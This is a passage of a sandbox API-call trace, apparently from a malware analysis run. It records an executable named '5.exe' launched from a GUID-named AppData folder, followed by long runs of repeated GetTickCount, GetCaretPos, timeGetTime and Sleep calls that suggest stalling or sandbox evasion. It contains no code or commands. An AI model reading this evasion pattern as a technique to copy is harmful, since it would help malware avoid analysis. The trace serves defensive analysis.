0 [0096.219] TranslateMessage (lpMsg=0x18e548) returned 0 [0096.219] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0096.219] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.139] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.139] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.139] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.139] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.139] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.139] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.139] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.141] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.159] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.159] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.159] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.159] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.159] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.160] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.160] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.161] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.237] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.237] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.237] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.237] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.237] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.238] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.238] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.239] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.507] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.507] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.507] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.507] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.507] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.507] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.507] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.508] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.550] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.550] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.550] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.550] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.550] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.550] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.550] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.551] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.597] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.597] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.597] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.597] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.597] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.597] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.597] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.598] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.931] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.931] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.931] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0098.933] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0098.933] TranslateAcceleratorW (hWnd=0x50016, hAccTable=0xa0155, lpMsg=0x18e548) returned 0 [0098.933] TranslateMessage (lpMsg=0x18e548) returned 0 [0098.933] DispatchMessageW (lpMsg=0x18e548) Thread: id = 56 os_tid = 0x9e4 [0080.597] timeGetTime () returned 0x115a5f0 [0080.597] timeGetTime () returned 0x115a5f0 [0080.597] Sleep (dwMilliseconds=0x3e8) [0081.733] timeGetTime () returned 0x115a9e6 [0081.733] timeGetTime () returned 0x115a9e6 [0081.733] Sleep (dwMilliseconds=0x3e8) [0082.793] timeGetTime () returned 0x115addc [0082.793] timeGetTime () returned 0x115addc [0082.793] Sleep (dwMilliseconds=0x3e8) [0083.808] timeGetTime () returned 0x115b1d2 [0083.808] timeGetTime () returned 0x115b1d2 [0083.808] Sleep (dwMilliseconds=0x3e8) [0085.046] timeGetTime () returned 0x115b5d8 [0085.046] timeGetTime () returned 0x115b5d8 [0085.046] Sleep (dwMilliseconds=0x3e8) [0088.768] timeGetTime () returned 0x115b9ce [0088.768] timeGetTime () returned 0x115b9ce [0088.768] Sleep (dwMilliseconds=0x3e8) [0089.788] timeGetTime () returned 0x115bdc4 [0089.788] timeGetTime () returned 0x115bdc4 [0089.788] Sleep (dwMilliseconds=0x3e8) [0091.421] timeGetTime () returned 0x115c1ba [0091.421] timeGetTime () returned 0x115c1ba [0091.421] Sleep (dwMilliseconds=0x3e8) [0092.953] timeGetTime () returned 0x115c7b3 [0092.953] timeGetTime () returned 0x115c7b3 [0092.953] Sleep (dwMilliseconds=0x3e8) [0093.964] timeGetTime () returned 0x115cba9 [0093.964] timeGetTime () returned 0x115cba9 [0093.964] Sleep (dwMilliseconds=0x3e8) [0096.219] timeGetTime () returned 0x115d46f [0096.219] timeGetTime () returned 0x115d46f [0096.220] Sleep (dwMilliseconds=0x3e8) [0098.142] timeGetTime () returned 0x115dbee [0098.142] timeGetTime () returned 0x115dbee [0098.142] Sleep (dwMilliseconds=0x3e8) Process: id = "9" image_name = "5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe" page_root = "0x318d6000" os_pid = "0x964" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x7f0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 51 os_tid = 0x974 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.051] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.052] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.053] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.054] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.055] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.056] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.057] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.058] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.059] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0079.060] GetTickCount () returned 0x1159fe8 [0083.886] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.886] GetACP () returned 0x4e4 [0083.886] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.886] GetACP () returned 0x4e4 [0083.886] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.886] GetACP () returned 0x4e4 [0083.886] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.886] GetACP () returned 0x4e4 [0083.886] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.886] GetACP () returned 0x4e4 [0083.886] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.886] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.887] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.887] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.888] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.888] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.889] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.889] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0083.890] GetACP () returned 0x4e4 [0083.890] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 